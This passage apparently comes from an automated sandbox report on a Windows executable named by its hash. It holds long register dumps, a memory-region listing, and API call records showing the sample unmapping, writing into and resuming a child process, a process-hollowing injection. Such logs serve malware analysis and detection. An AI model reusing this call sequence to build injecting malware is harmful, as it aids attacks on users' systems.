[73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x369000, Edx=0x0, Ecx=0x0, Eax=0x4164e7, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0074.959] ReadProcessMemory (in: hProcess=0x110, lpBaseAddress=0x369008, lpBuffer=0x19ee38, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19ee38*, lpNumberOfBytesRead=0x0) returned 1 [0074.959] NtUnmapViewOfSection (ProcessHandle=0x110, BaseAddress=0x400000) returned 0x0 [0075.280] VirtualAllocEx (hProcess=0x110, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0075.434] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x400000, Buffer=0x24d15a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x24d15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0075.613] NtWriteVirtualMemory (in: ProcessHandle=0x110, BaseAddress=0x401000, Buffer=0x24d17a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x24d17a0*, NumberOfBytesWritten=0x0) returned 0x0 [0075.706] WriteProcessMemory (in: hProcess=0x110, lpBaseAddress=0x369008, lpBuffer=0x24d1654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x24d1654*, lpNumberOfBytesWritten=0x0) returned 1 [0075.714] SetThreadContext (hThread=0x10c, lpContext=0x24f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x369000, Edx=0x0, Ecx=0x0, Eax=0x402dd8, Ebp=0x0, Eip=0x77248fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0075.719] ResumeThread (hThread=0x10c) returned 0x1 [0076.059] CloseHandle (hObject=0x10c) returned 1 [0076.059] CloseHandle (hObject=0x110) returned 1 [0076.059] ExitProcess (uExitCode=0x0) [0076.060] HeapFree (in: hHeap=0x41c0000, dwFlags=0x0, lpMem=0x41c05a8 | out: hHeap=0x41c0000) returned 1 Thread: id = 2 os_tid = 0x150 Process: id = "2" image_name = "22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" page_root = "0x336c6000" os_pid = "0xc90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13fc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 319 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 320 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 321 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 322 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 323 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 324 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 325 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 326 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 327 start_va = 0x400000 end_va = 0x24b2fff monitored = 1 entry_point = 0x4164e7 region_type = mapped_file name = "22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe") Region: id = 328 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 329 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 330 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 331 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 332 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 333 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 335 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 336 start_va = 0x410000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 337 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 338 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 339 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 340 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 341 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 342 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 343 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 344 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 345 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 346 start_va = 0x4d0000 end_va = 0x58dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 347 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 348 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 349 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 350 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 351 start_va = 0x410000 end_va = 0x439fff monitored = 0 entry_point = 0x415680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 352 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 353 start_va = 0x690000 end_va = 0x817fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 354 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 355 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 356 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 357 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 358 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 359 start_va = 0x420000 end_va = 0x423fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 360 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 361 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = 